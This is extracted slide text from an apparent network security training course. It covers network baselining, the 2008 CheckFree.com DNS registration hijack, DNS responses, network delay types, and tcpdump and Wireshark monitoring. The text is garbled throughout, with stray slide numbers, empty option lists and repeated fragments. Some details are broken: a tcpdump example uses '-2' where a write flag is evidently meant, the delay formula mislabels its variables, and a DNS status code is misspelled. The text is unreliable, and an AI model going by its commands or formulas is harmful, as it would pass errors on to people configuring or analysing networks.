Hardware inventory
Software inventory
Vulnerability assessment
Wireless access controls
Control ports/protocols
Boundary defense
Account monitoring
Incident response
Network engineering
183
185
Monitor
Detect
Recover
Analyze
Respond
187
Baseline
Monitor
Do This
Before This
Quick!
Detect
Your Detection
Time May Vary
Analyze
Prevent
Respond
Recover
Stop Effect
188
Establishing a Baseline
If you know the enemy and know yourself you need
not fear the results of a hundred battles
Architecture
Traffic
People
Processes
Vulnerabilities
Establishing a Baseline
Architecture Baseline
Hosts, Services, Ports, Connections, Addresses
190
Establishing a Baseline
Architecture Baseline
Document your host configurations, operating
systems, applications, versions, etc
Establishing a Baseline
Architecture Baseline Tools
Visio
Paper / Pencil!
NAGIOS, OpenNMS, HP Openview, etc
192
Establishing a Baseline
Traffic Baseline
What kind, how much, source / destination, and
usual time
193
Establishing a Baseline
External Traffic Baseline
How much traffic (packets per second, megabits per
second, etc) is normal on your external links?
What kind of traffic to external servers (e.g. do you
normally have SSH connections to your DNS servers?)
Establishing a Baseline
Traffic Baseline
Again, ideally, you will have this information
readily available during the analysis phase
For example, can you easily answer the question:
195
Establishing a Baseline
Traffic Baseline Tools
NetFlow
Wireshark
Tcpdump
Iperf, dnsperf
Establishing a Baseline
People Baseline
How do your customers interact with your network?
Web application for processing registration?
Do you typically see people login at 0330?
Establishing a Baseline
People Baseline
Again, ideally, you will have this information
readily available during the analysis phase
For example, can you easily answer the question:
198
Establishing a Baseline
People Baseline Tools
Personnel Interviews
How does Bob usually do his job via the network?
199
Establishing a Baseline
Processes Baseline
Processes typically fuse people and technology
Even though the people and technology may not have
issues, the processes that pull them together might
Processes can be:
Business oriented (e.g. processing user registration
updates)
Operational (e.g. responding to a DDoS attack)
Establishing a Baseline
Process Baseline
Creating a baseline of your processes requires an
understanding of what you do and how you do it!
Again, information should be readily accessible:
Can you easily answer this question:
Establishing a Baseline
Process Baseline Tools
Understand your critical business functions and
whats required to provide those functions
Walkthroughs & Reviews
Personnel Interviews & Surveys
See the Attack & Contingency Planning Course
202
Establishing a Baseline
Vulnerability Baseline
Vulnerabilities in Operating Systems & Applications
Vulnerabilities in Your Business or Operational Processes
Processing registrations, responding to cyber attacks, etc
Establishing a Baseline
Vulnerability Baseline
To determine technical vulnerabilities, use automated tools
To determine procedural vulnerabilities, think like a bad guy
Establishing a Baseline
Vulnerability Baseline Tools
Nessus, LanGuard, SuperScan, Retina
Process Walkthroughs
Take each of your critical processes and step through
them attempting to identify weaknesses
Establishing a Baseline
Other Sources of Baseline Information:
Senior Management
Technicians &
Support Staff
Important assets
Perceived threats
Security requirements
Current security practices
Organizational vulnerabilities
206
207
208
209
210
WRAP-UP
Questions?
21
1
212
CHECKFREE.COM
Special thanks to Rod Rasmussen of Internet Identity for
contributing source material for this study.
21
3
213
CheckFree.com Background
the largest provider of on-line bill payment
services in the United States
1.4 billion transactions every year, and 75% of all
ACH (automated clearing house) transactions in
the United States
Serves 22 of the top 25 financial institutions in
the U.S
AT&T, Bank of America, Chevron, DIRECTTV, and
Time Warner Cable, among many others, allow
their customer to pay their bills electronically via
CheckFree.com services
214
CheckFree.com Background
December 2, 2008, at about 0030 EST, an attacker modified
the authoritative nameserver registration for
CheckFree.com
Used an on-line control panel belonging to Network Solutions
(CheckFree.coms registrar)
Pointed the registration to Network Solutions free nameserver
at nsXX.worldnic.com
CheckFree.com Background
Customers visiting the site were presented with a
blank page instead of the normal bill payment site.
At best, customers were denied access to their bill
payment service; at worst, customers were infected
with malware.
216
CheckFree.com Epilogue
Attacker had compromised CheckFree.coms control panel
username and password used to access their registration
data at Network Solutions. Interestingly enough, Network
Solutions had warned its customers of a phishing attack
that attempted to solicit credentials via a website spoofed
to look like Network Solutions own site
The motivation for the attack appeared to be malware
distribution
217
CheckFree.com Epilogue
CheckFree.com Analysis
CF Customer Site
(Utility)
bank.checkfree.com
utility.checkfreeweb.com
CheckFree.com
Bill Pay Server
ecom.mycheckfree.com
CF Customer Site
(E-Commerce)
219
22
0
Query
Answer
Server Queried
221
222
Status
As told by
NOERROR
NXDOMAIN
SRVFAIL
REFUSED
NOTIMP
223
MX, not A
Mail Servers
A
AAAA
NS
MX
TXT
224
Received from
root server
Received from
.ORG server
Received from
first.org server
226
227
Definitions
PERFORMANCE MONITORING
23
0
Types of Delay
Causes of end-to-end delay:
Processor delays
Buffer delays
Transmission delays
Propagation delays
231
Processing Delay
Required time to analyze a packet header and
decide where to send the packet (eg. a
routing decision)
Inside a router this depends on the number of
entries in the routing table, the implementation
of data structures, hardware in use, etc.
232
Queuing Delay
The time a packet is enqueued until it is
transmitted
The number of packets waiting in the queue
will depend on traffic intensity and of the
type of traffic
Router queue algorithms try to adapt delays
to specific preferences, or impose equal delay
on all traffic.
233
Transmission Delay
The time required to push all the bits in a
packet on the transmission medium in use
For N=Number of bits, S=Size of packet, d=delay
d = S/N
For example, to transmit 1024 bits using Fast
Ethernet (100Mbps):
d = 1024/1x10e8 = 10.24 micro seconds
234
Propagation Delay
Once a bit is 'pushed' on to the transmission
medium, the time required for the bit to
propagate to the end of its physical trajectory
The velocity of propagation of the circuit
depends mainly on the actual distance of the
physical circuit
In the majority of cases this is close to the
speed of light.
For d = distance, s = propagation velocity
PD = d/s
235
Packet Loss
238
Controls in TCP
IP (Internet Protocol) implements service that
not connection oriented.
There is no mechanism in IP to deal with packet
loss.
239
Behaviors:
Additive Increments / Multiplicative Decrements (AIMD)
Slow Start
React to timeout events
240
241
Load Average
Average number of active processes in the
last 1, 5 and 15 minutes
A simple yet useful measurement
Depending on the machine the acceptable range
considered to be normal can vary:
Multi-processor machines can handle more active
processes per unit of time (than single processor
machines)
242
top
Some useful interactive keyboard commands
for top
f
F
<,>
u
k
d,s
243
tcpdump
Show received packet headers by a given
interface. Optionally filter using boolean
expressions.
Allows you to write information to a file for
later analysis.
Requires administrator (root) privileges to use
since you must configure network interfaces
(NICs) to be in promiscuous mode.
244
tcpdump
Some useful options:
-i :
-l :
you
capture)
-v, -vv, -vvv: Display more information
-n :
Don't convert addresses to names
(avoid DNS)
-nn :
Don't translate port numbers
-w :
Write raw packets to a file
-r :
Read packets from a file created by
245
tcpdump
Boolean expressions:
Using the 'AND', 'OR', 'NOT' operators
Expressions consist of one, or more, primtives,
which consist of a qualifier and an ID (name or
number):
Expression ::= [NOT] <primitive> [ AND | OR | NOT
<primitive> ...]
<primitive> ::= <qualifier> <name|number>
<qualifier> ::= <type> | <address> | <protocol>
<type> ::= host | net | port | port range
<address> ::= src | dst
<protocol> ::= ether | fddi | tr | wlan | ip | ip6 | arp |
246
tcpdump
Examples:
Show all HTTP traffic that originates from
192.168.1.1
# tcpdump -lnXvvv port 80 and src host 192.168.1.1
247
Wireshark
Wireshark is a graphical packet analyser
based on libpcap, the same library that
tcpdump utilizes for capturing and storing
packets
The graphical interface has some advantages, including:
Hierarchical visualization by protocol (drill-down)
Follow a TCP conversation (Follow TCP Stream)
Colors to distinguish traffic types
Lots of statistics, graphs, etc.
248
Wireshark
Wireshark is what came after Ethereal.
The combination of tcpdump and wireshark
can be quite powerful. For example:
# tcpdump -i eth1 -A -s1500 -2 dump.log port 21
$ sudo wireshark -r dump.log
249
Wireshark
250
Supplemental Information
DNS THREATS
25
1
Checkfree.com
Disruption Attacks
Disruption Attacks
256
Delta Risk, LLC 2009
256
Disruption Attacks
Disruption Attacks
Disruption Attacks
01
01
01
01
259
259
Disruption Attacks
01
01
01
01
262
26
4